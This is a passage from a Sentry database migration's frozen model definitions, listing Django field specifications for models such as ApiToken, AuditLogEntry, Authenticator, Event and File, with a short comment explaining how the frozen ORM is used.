'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'key_set'", 'to': "orm['sentry.Organization']"}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.apitoken': {
'Meta': {'unique_together': '()', 'object_name': 'ApiToken', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 6, 15, 0, 0)', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'refresh_token': ('django.db.models.fields.CharField', [], {'default': "'1baed9fb48f145d2ac57b013160dc650e4c940d6c5f14789a331cf28b3af7c45'", 'max_length': '64', 'unique': 'True', 'null': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'token': ('django.db.models.fields.CharField', [], {'default': "'cde3d55c0f444c42acd08de782b5f7fcf3a0c44d35a94cb4b40472b82a437a0d'", 'unique': 'True', 'max_length': '64'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.assistantactivity': {
'Meta': {'unique_together': "(('user', 'guide_id'),)", 'object_name': 'AssistantActivity', 'db_table': "'sentry_assistant_activity'", 'index_together': '()'},
'dismissed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'guide_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'useful': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'viewed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'unique_together': '()', 'object_name': 'AuditLogEntry', 'index_together': '()'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'audit_actors'", 'null': 'True', 'to': "orm['sentry.User']"}),
'actor_key': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiKey']", 'null': 'True', 'blank': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authenticator': {
'Meta': {'unique_together': "(('user', 'type'),)", 'object_name': 'Authenticator', 'db_table': "'auth_authenticator'", 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity', 'index_together': '()'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'unique_together': '()', 'object_name': 'AuthProvider', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'unique_together': '()', 'object_name': 'Broadcast', 'index_together': '()'},
'cta': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 5, 23, 0, 0)', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'upstream_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'})
},
'sentry.broadcastseen': {
'Meta': {'unique_together': "(('broadcast', 'user'),)", 'object_name': 'BroadcastSeen', 'index_together': '()'},
'broadcast': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Broadcast']"}),
'date_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.commit': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'Commit', 'index_together': "(('repository_id', 'date_added'),)"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {'unique_together': "(('organization_id', 'email'), ('organization_id', 'external_id'))", 'object_name': 'CommitAuthor', 'index_together': '()'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '164', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.commitfilechange': {
'Meta': {'unique_together': "(('commit', 'filename'),)", 'object_name': 'CommitFileChange', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'sentry.counter': {
'Meta': {'unique_together': '()', 'object_name': 'Counter', 'db_table': "'sentry_projectcounter'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.dashboard': {
'Meta': {'unique_together': "(('organization', 'title'),)", 'object_name': 'Dashboard', 'index_together': '()'},
'created_by': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sentry.deletedorganization': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedOrganization', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedproject': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedProject', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedteam': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedTeam', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deploy': {
'Meta': {'unique_together': '()', 'object_name': 'Deploy', 'index_together': '()'},
'date_finished': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'notified': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'sentry.discoversavedquery': {
'Meta': {'unique_together': '()', 'object_name': 'DiscoverSavedQuery', 'index_together': '()'},
'created_by': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.DiscoverSavedQueryProject']", 'symmetrical': 'False'}),
'query': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.discoversavedqueryproject': {
'Meta': {'unique_together': "(('project', 'discover_saved_query'),)", 'object_name': 'DiscoverSavedQueryProject', 'index_together': '()'},
'discover_saved_query': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.DiscoverSavedQuery']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.distribution': {
'Meta': {'unique_together': "(('release', 'name'),)", 'object_name': 'Distribution', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.email': {
'Meta': {'unique_together': '()', 'object_name': 'Email', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('sentry.db.models.fields.citext.CIEmailField', [], {'unique': 'True', 'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
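        # A brief, hedged usage sketch (kept as comments so this generated dict stays
        # valid Python): each key in this frozen-definitions mapping is a lowercased
        # "app.ModelName", and each field maps to a
        # (field class path, positional args, keyword args) triple. South rebuilds
        # these entries into the frozen ORM handed to a data migration's
        # forwards()/backwards(), so the sentry.Email entry just above could be
        # queried roughly as:
        #
        #     def forwards(self, orm):
        #         # 'orm' exposes only the models frozen in this dict
        #         Email = orm['sentry.Email']   # or orm.Email for this app
        #         Email.objects.filter(email__iexact='user@example.com')
        #
        # The method body, filter, and address above are illustrative assumptions,
        # not something taken from this migration.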
'sentry.environment': {
'Meta': {'unique_together': "(('organization_id', 'name'),)", 'object_name': 'Environment', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.EnvironmentProject']", 'symmetrical': 'False'})
},
'sentry.environmentproject': {
'Meta': {'unique_together': "(('project', 'environment'),)", 'object_name': 'EnvironmentProject', 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_hidden': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.event': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group_id', 'datetime'),)"},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventattachment': {
'Meta': {'unique_together': "(('project_id', 'event_id', 'file'),)", 'object_name': 'EventAttachment', 'index_together': "(('project_id', 'date_added'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'EventMapping', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventprocessingissue': {
'Meta': {'unique_together': "(('raw_event', 'processing_issue'),)", 'object_name': 'EventProcessingIssue', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'processing_issue': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProcessingIssue']"}),
'raw_event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.RawEvent']"})
},
'sentry.eventtag': {
'Meta': {'unique_together': "(('event_id', 'key_id', 'value_id'),)", 'object_name': 'EventTag', 'index_together': "(('group_id', 'key_id', 'value_id'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {'unique_together': "(('project_id', 'ident'), ('project_id', 'hash'))", 'object_name': 'EventUser', 'index_together': "(('project_id', 'email'), ('project_id', 'username'), ('project_id', 'ip_address'))"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'sentry.externalissue': {
'Meta': {'unique_together': "(('organization_id', 'integration_id', 'key'),)", 'object_name': 'ExternalIssue', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'metadata': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.featureadoption': {
'Meta': {'unique_together': "(('organization', 'feature_id'),)", 'object_name': 'FeatureAdoption', 'index_together': '()'},
'applicable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.file': {
'Meta': {'unique_together': '()', 'object_name': 'File', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'legacy_blob'", 'null': 'True', 'to': "orm['sentry.FileBlob']"}),
'blobs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.FileBlob']", 'through': "orm['sentry.FileBlobIndex']", 'symmetrical': 'False'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'headers': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.fileblob': {
'Meta': {'unique_together': '()', 'object_name': 'FileBlob', 'index_together': '()'},
'checksum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'})
},
'sentry.fileblobindex': {
'Meta': {'unique_together': "(('file', 'blob', 'offset'),)", 'object_name': 'FileBlobIndex', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.fileblobowner': {
'Meta': {'unique_together': "(('blob', 'organization'),)", 'object_name': 'FileBlobOwner', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'short_id'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'", 'index_together': "(('project', 'first_release'),)"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
